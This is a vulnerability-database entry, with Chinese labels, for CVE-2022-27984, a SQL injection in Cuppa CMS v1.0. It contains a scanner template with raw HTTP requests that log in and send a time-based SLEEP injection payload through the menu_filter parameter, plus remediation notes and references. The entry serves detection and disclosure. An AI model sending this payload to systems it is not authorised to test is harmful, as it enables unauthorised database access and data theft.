CVE-2022-27984: Cuppa CMS v1.0 - SQL injection

日期: 2025-08-01 | 影响软件: Cuppa CMS | POC: 已公开

漏洞描述

CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via the menu_filter parameter at /administrator/templates/default/html/windows/right.php.

PoC代码[已公开]

id: CVE-2022-27984

info:
  name: Cuppa CMS v1.0 - SQL injection
  author: theamanrawat
  severity: critical
  description: |
    CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via the menu_filter parameter at /administrator/templates/default/html/windows/right.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system.
  remediation: |
    Apply the latest patch or upgrade to a newer version of Cuppa CMS that addresses the SQL injection vulnerability (CVE-2022-27984).
  reference:
    - https://github.com/CuppaCMS/CuppaCMS
    - https://nvd.nist.gov/vuln/detail/CVE-2022-27984
    - https://www.cuppacms.com/
    - http://cuppa.com
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-27984
    cwe-id: CWE-89
    epss-score: 0.24635
    epss-percentile: 0.95942
    cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: cuppacms
    product: cuppacms
  tags: time-based-sqli,cve,cve2022,sqli,cuppa,authenticated,cuppacms

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&password={{password}}&language=en&task=login
      - |
        @timeout: 20s
        POST /templates/default/html/windows/right.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        menu_filter=3'+AND+SLEEP(6)--+-&id=211&url=components%2Fmenu%2Fhtml%2Fedit.php&path=component%2Fmenu%2F%26menu_filter%3D3&uniqueClass=window_right_7526357

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "components/menu/classes/functions.php")'
        condition: and
# digest: 490a0046304402200d7d3740bd693a4950c803c8a969df4fc71abf925cec2ba0af23aa3b3b731a260220286ca037f1e23f7043be35dcb2d970b8da14b20acbe12513ee9e0e57b74de0a9:922c64590222798bb761d5b6d8e72950

相关漏洞推荐